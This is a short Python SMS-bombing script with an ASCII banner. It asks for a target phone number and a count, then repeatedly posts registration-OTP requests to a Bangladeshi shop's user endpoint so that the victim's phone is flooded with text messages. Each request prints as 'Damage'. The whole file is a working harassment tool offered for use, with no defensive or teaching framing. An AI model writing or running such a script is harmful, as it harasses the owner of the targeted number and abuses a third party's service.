import requests
from requests.structures import CaseInsensitiveDict

green = '\033[1;32m'
end = '\033[0m'
print (green+"""  _ _____                         
 (_)_   _|___                     
 | | | ||_  /                     
 | | | | / /                      
 |_| |_|/___|                     
  ____        ____  _ _   _       
 |  _ \ _   _|  _ \(_) \ | | __ _ 
 | |_) | | | | | | | |  \| |/ _` |
 |  __/| |_| | |_| | | |\  | (_| |
 |_|    \__,_|____/|_|_| \_|\__,_|
                                  """+end)


# CVALUE
blue = '\33[94m'
lightblue = '\033[94m'
red = '\033[91m'
white = '\33[97m'
yellow = '\33[93m'
green = '\033[1;32m'
cyan = "\033[96m"
end = '\033[0m'
print ("\033[32m")

number  = str(input("[>] apNar aTTack NumBer DiN: "))
amount = int(input("[>] apNar aTTack ar PoriMaN LikHuN: "))

url = "https://shopup.com.bd/users/send_user_otp.json"

headers = CaseInsensitiveDict()
headers["Content-Type"] = "application/json"

data = '{"user":{"login":"88'+number+'","resend":false,"type":{"register":true}},"direct_login":true}'


for i in range(amount):

	resp = requests.post(url, headers=headers, data=data)
	
	print(str (i+1)+" Damage \n")